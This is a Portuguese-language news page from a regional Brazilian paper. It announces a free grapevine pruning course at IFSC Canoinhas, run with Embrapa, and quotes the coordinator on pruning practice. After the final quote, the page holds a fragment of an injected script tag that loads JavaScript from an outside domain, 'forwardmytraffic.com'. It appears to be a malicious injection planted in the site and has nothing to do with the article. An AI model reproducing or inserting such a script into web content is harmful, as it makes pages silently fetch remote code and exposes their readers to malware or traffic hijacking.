InícioDestaqueIFSC Promove Curso sobre Poda da Videira em Canoinhas

IFSC Promove Curso sobre Poda da Videira em Canoinhas

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Inscrições podem ser feitas até dia 25 de julho

O Câmpus Canoinhas do Instituto Federal de Santa Catarina (IFSC) realiza mais um curso na área de viticultura, desta vez de Poda da Videira, que acontece no dia 1º de agosto, com oito horas de duração e totalmente gratuito. As inscrições para as 50 vagas disponíveis estão abertas e devem ser feitas até 25 de julho, pela internet, no Sistema Integrado de Gestão de Atividades Acadêmicas (Sigaa). Podem participar produtores rurais, estudantes e profissionais da área de fruticultura. O curso é realizado pelo IFSC em parceria com a Empresa Brasileira de Pesquisa Agropecuária (Embrapa).

 

Durante o curso, os participantes terão aula teórica e atividades práticas de capacitação sobre aspectos relacionados à poda da videira, com objetivo de melhorar a produtividade e a qualidade da uva, além de incentivar o cultivo da videira na região do Planalto Norte como uma alternativa geradora de renda e emprego para a agricultura familiar.

 

Conforme o coordenador do curso e professor do curso de Agroecologia, Douglas André Wurz, a cultura da videira tem grande potencial de cultivo na região, mas apresenta índices de produtividade muito abaixo do ideal. “A poda é uma prática de manejo fundamental para garantir uma boa safra de uva, com impacto direto na qualidade e produtividade da videira”, justifica o professor.

Ele explica que a poda limita o número de gemas para regularizar e harmonizar a relação entre a capacidade produtiva e o vigor de crescimento dos ramos que a videira pode apresentar durante o ciclo. “Esta prática também auxilia, de modo indireto, nos tratos culturais, pois organiza a distribuição dos ramos e cachos, possibilitando uma maior abertura do dossel vegetativo, que garante maior aeração, incidência solar e acesso dos tratamentos fitossanitários”, esclarece…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.